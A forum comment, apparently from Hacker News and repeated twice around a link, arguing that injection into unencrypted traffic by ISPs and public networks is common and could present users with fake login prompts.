This is far more common than you think. ISPs, hotels, cafes, mobile providers do this en masse far more than you think. Have you forgotten the NSA “SSL added and removed here”? That was a highly targeted attack against infrastructure. What we’re discussing here is 10x easier to achieve.
> And even if it was the risk is just crap injected into someone’s blog.
That “crap injected” has full control over the DOM, any authentication, and everything displayed. How many of your users would happily put their creds into a fake login modal that popped up claiming to be SSO for a popular identity provider?
https://news.ycombinator.com/item?id=3804608
This is far more common than you think. ISPs, hotels, cafes, mobile providers do this en masse far more than you think. Have you forgotten the NSA “SSL added and removed here”? That was a highly targeted attack against infrastructure. What we’re discussing here is 10x easier to achieve.
> And even if it was the risk is just crap injected into someone’s blog.
That “crap injected” has full control over the DOM, any authentication, and everything displayed. How many of your users would happily put their creds into a fake login modal that popped up claiming to be SSO for a popular identity provider?